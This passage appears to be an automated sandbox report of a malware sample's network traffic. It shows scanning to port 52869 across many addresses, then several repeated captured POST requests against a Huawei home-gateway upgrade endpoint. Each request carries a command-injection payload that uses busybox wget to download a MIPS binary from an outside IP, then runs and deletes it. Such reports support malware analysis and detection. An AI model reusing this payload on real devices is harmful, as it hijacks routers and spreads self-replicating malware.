Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.100.132.186:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.145.65.224:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.254.19.174:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.254.160.186:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.228.31.11:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.60.238.247:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.6.8.67:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.138.136.146:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.72.182.175:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.117.224.52:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.16.193.57:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.207.11.254:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.61.29.67:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.207.39.40:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.157.199.53:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.221.224.43:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.234.237.25:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.144.169.225:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.143.50.230:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.19.51.189:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.83.253.15:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.28.82.141:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.255.2.32:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.1.134.225:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.106.85.181:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.196.97.251:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.238.221.177:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.249.254.243:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.100.85.54:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.237.204.95:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.162.132.151:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.27.56.71:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.96.209.16:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.101.39.230:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.143.149.127:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.48.51.197:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.109.216.5:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.69.83.121:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.89.143.69:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.221.220.77:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.236.137.203:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.120.142.42:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.68.72.242:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.207.173.155:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.71.66.77:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.174.179.176:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.127.197.217:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.61.195.60:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.157.188.70:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.222.209.214:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.26.240.53:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.207.17.152:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.56.170.204:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.78.116.168:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.28.241.249:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.161.144.183:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.99.100.58:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.90.4.74:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.227.74.160:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.250.174.229:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.248.247.66:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.211.184.250:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.66.202.169:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.56.39.105:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.177.171.129:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.219.232.234:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.226.15.214:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.86.75.236:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.68.161.20:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.193.107.8:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.131.239.50:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.126.43.13:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.3.136.6:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.55.159.117:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.79.19.153:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.48.176.15:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.225.147.243:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.237.214.110:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.253.192.251:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.94.181.247:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.14.204.2:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.232.110.44:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.128.53.32:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.49.47.146:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.60.69.233:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.165.108.122:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.73.135.211:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.36.164.99:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.5.183.138:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.44.29.103:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.60.55.146:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.176.162.200:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.61.73.174:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.116.153.199:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.120.33.179:52869 |
Source: global traffic | TCP traffic: 192.168.2.23:58210 -> 195.236.120.64:52869 |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 32 30 31 2e 32 38 2e 31 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 74.201.28.102 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 32 30 31 2e 32 38 2e 31 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 74.201.28.102 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 32 30 31 2e 32 38 2e 31 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 74.201.28.102 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 32 30 31 2e 32 38 2e 31 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 74.201.28.102 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 32 30 31 2e 32 38 2e 31 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 74.201.28.102 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 32 30 31 2e 32 38 2e 31 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 74.201.28.102 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 32 30 31 2e 32 38 2e 31 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 